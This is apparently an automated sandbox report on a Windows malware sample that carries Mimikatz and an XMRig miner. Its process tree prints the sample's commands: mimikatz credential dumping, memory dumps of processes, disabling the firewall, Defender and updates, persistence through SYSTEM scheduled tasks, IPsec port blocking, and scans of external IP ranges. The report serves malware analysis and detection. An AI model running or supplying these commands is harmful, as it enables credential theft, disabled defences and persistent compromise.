Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26-11-2024 13:48

General

  • Target

    2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe

  • Size

    9.7MB

  • MD5

    6f9e36e57297c31b816334750f50f887

  • SHA1

    660b1b9e7e6048f7c168dafcb513f0a2906dd729

  • SHA256

    53dc7b99cdb3d5dffb9adf9bfeb240e658275ceebcc801d32b5f8a60404c087a

  • SHA512

    709fa850e551145bf3f29c2db770ee8cbcf3dc2b4baeb4057f21a3135aae99bebf4bf00873277c3f2c24a39681c74359668e522f45b49f478166f54be239d265

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (20637) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1004
      • C:\Windows\TEMP\eyuduassi\uuetgf.exe
        "C:\Windows\TEMP\eyuduassi\uuetgf.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3600
    • C:\Users\Admin\AppData\Local\Temp\2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3248
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3704
        • C:\Windows\seumlgyb\lebulsi.exe
          C:\Windows\seumlgyb\lebulsi.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4828
    • C:\Windows\seumlgyb\lebulsi.exe
      C:\Windows\seumlgyb\lebulsi.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1348
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4548
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:5012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2424
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4616
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:396
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4636
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3388
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:4524
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3200
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:736
          • C:\Windows\zthyliniv\eftbbbiir\wpcap.exe
            C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4920
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:864
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:4964
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4576
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4316
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:5096
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3424
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4592
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3804
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:336
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
                PID:2396
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                    PID:4396
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2480
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2980
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1072
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4520
                • C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe
                  C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:3636
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:3608
                • C:\Windows\zthyliniv\Corporate\vfshost.exe
                  C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3928
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3356
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2264
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1544
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1116
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3084
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3368
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                2⤵
                  PID:2184
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4776
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3200
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3520
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3212
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3056
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2972
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3728
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4316
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3916
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1700
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1768
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4944
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4396
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3216
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1680
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:968
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                        PID:4476
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3704
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3012
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:396
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:724
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3892
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3896
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3536
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1956
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4300
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop WinDefend
                        4⤵
                          PID:2888
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1448
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4536
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3480
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1224
                      • C:\Windows\SysWOW64\sc.exe
                        sc config MpsSvc start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:1160
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config SharedAccess start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1848
                      • C:\Windows\SysWOW64\sc.exe
                        sc config SharedAccess start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2156
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config WinDefend start= disabled
                      2⤵
                        PID:3028
                        • C:\Windows\SysWOW64\sc.exe
                          sc config WinDefend start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:2684
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config wuauserv start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4996
                        • C:\Windows\SysWOW64\sc.exe
                          sc config wuauserv start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:5028
                      • C:\Windows\TEMP\xohudmc.exe
                        C:\Windows\TEMP\xohudmc.exe
                        2⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:3484
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 780 C:\Windows\TEMP\zthyliniv\780.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:880
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1020 C:\Windows\TEMP\zthyliniv\1020.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1532
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1004 C:\Windows\TEMP\zthyliniv\1004.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4124
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2528 C:\Windows\TEMP\zthyliniv\2528.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4568
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2912 C:\Windows\TEMP\zthyliniv\2912.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1768
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2316 C:\Windows\TEMP\zthyliniv\2316.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1608
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3104 C:\Windows\TEMP\zthyliniv\3104.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4024
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3740 C:\Windows\TEMP\zthyliniv\3740.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4004
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3836 C:\Windows\TEMP\zthyliniv\3836.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1872
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3900 C:\Windows\TEMP\zthyliniv\3900.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4304
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3984 C:\Windows\TEMP\zthyliniv\3984.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4108
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2632 C:\Windows\TEMP\zthyliniv\2632.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3180
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3580 C:\Windows\TEMP\zthyliniv\3580.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1044
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 400 C:\Windows\TEMP\zthyliniv\400.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3752
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4992 C:\Windows\TEMP\zthyliniv\4992.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4524
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4440 C:\Windows\TEMP\zthyliniv\4440.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2800
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4604 C:\Windows\TEMP\zthyliniv\4604.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1532
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c C:\Windows\zthyliniv\eftbbbiir\scan.bat
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1500
                        • C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe
                          ysesbhsym.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                          3⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:1680
                    • C:\Windows\SysWOW64\jobnkm.exe
                      C:\Windows\SysWOW64\jobnkm.exe
                      1⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      PID:2052
                     • C:\Windows\system32\cmd.EXE
                       C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lebulsi.exe
                       1⤵
                       PID:940
                       • C:\Windows\ime\lebulsi.exe
                         C:\Windows\ime\lebulsi.exe
                         2⤵
                         • Executes dropped EXE
                         • Suspicious use of SetWindowsHookEx
                         PID:996
                     • C:\Windows\system32\cmd.EXE
                       C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                       1⤵
                       PID:1720
                       • C:\Windows\system32\cmd.exe
                         C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                         2⤵
                         PID:2260
                       • C:\Windows\system32\cacls.exe
                         cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                         2⤵
                         PID:4064
                     • C:\Windows\system32\cmd.EXE
                       C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                       1⤵
                       PID:1856
                       • C:\Windows\system32\cmd.exe
                         C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                         2⤵
                         PID:2764
                       • C:\Windows\system32\cacls.exe
                         cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                         2⤵
                         PID:1776

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Downloads

                                  • C:\Windows\SysWOW64\Packet.dll

                                    Filesize

                                    95KB

                                    MD5

                                    86316be34481c1ed5b792169312673fd

                                    SHA1

                                    6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                    SHA256

                                    49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                    SHA512

                                    3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                  • C:\Windows\SysWOW64\wpcap.dll

                                    Filesize

                                    275KB

                                    MD5

                                    4633b298d57014627831ccac89a2c50b

                                    SHA1

                                    e5f449766722c5c25fa02b065d22a854b6a32a5b

                                    SHA256

                                    b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                    SHA512

                                    29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                  • C:\Windows\TEMP\eyuduassi\config.json

                                    Filesize

                                    693B

                                    MD5

                                    f2d396833af4aea7b9afde89593ca56e

                                    SHA1

                                    08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                    SHA256

                                    d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                    SHA512

                                    2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                  • C:\Windows\TEMP\zthyliniv\1004.dmp

                                    Filesize

                                    4.1MB

                                    MD5

                                    3430ee9f285dfdba7686781f37d538b8

                                    SHA1

                                    6583079dd156f1293a484e1a847ee881c9f216f6

                                    SHA256

